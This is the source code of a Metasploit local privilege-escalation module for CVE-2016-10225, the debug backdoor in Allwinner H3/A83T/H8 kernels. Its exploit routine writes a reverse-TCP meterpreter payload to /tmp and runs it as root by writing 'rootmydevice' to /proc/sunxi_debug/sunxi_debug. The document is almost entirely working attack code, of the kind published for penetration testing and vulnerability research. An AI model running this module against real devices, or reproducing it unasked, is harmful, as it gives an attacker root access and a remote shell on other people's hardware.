Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Linux::Priv
11
  include Msf::Exploit::EXE
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Allwinner 3.4 Legacy Kernel Local Privilege Escalation',
18
        'Description' => %q{
19
          This module attempts to exploit a debug backdoor privilege escalation in
20
          Allwinner SoC based devices.
21

22
          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.
23

24
          Vulnerable OS: all OS images available for Orange Pis,
25
          any for FriendlyARM's NanoPi M1,
26
          SinoVoip's M2+ and M3,
27
          Cuebietech's Cubietruck +
28
          Linksprite's pcDuino8 Uno.
29
          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.
30
        },
31
        'License' => MSF_LICENSE,
32
        'Author' => [
33
          'h00die <[email protected]>', # Module
34
          'KotCzarny' # Discovery
35
        ],
36
        'Platform' => [ 'android', 'linux' ],
37
        'DisclosureDate' => '2016-04-30',
38
        'DefaultOptions' => {
39
          'payload' => 'linux/armle/meterpreter/reverse_tcp'
40
        },
41
        'Privileged' => true,
42
        'Arch' => ARCH_ARMLE,
43
        'References' => [
44
          [ 'CVE', '2016-10225' ],
45
          [ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
46
          [
47
            'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:' \
48
                   'https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'
49
          ],
50
          [ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
51
        ],
52
        'SessionTypes' => [ 'shell', 'meterpreter' ],
53
        'Targets' => [
54
          [ 'Auto', {} ]
55
        ],
56
        'Notes' => {
57
          'Reliability' => [ REPEATABLE_SESSION ],
58
          'Stability' => [ CRASH_SAFE ],
59
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
60
        },
61
        'DefaultTarget' => 0
62
      )
63
    )
64
  end
65

66
  def check
67
    backdoor = '/proc/sunxi_debug/sunxi_debug'
68

69
    if file_exist?(backdoor)
70
      return CheckCode::Appears("#{backdoor} exists")
71
    end
72

73
    CheckCode::Safe("Backdoor #{backdoor} not found")
74
  end
75

76
  def exploit
77
    backdoor = '/proc/sunxi_debug/sunxi_debug'
78

79
    fail_with(Failure::NotVulnerable, "Backdoor #{backdoor} not found.") unless file_exist?(backdoor)
80

81
    pl = generate_payload_exe
82
    exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
83
    vprint_good "Backdoor Found, writing payload to #{exe_file}"
84
    write_file(exe_file, pl)
85
    cmd_exec("chmod +x #{exe_file}")
86

87
    vprint_good('Escalating')
88
    cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
89
  end
90
end
91

92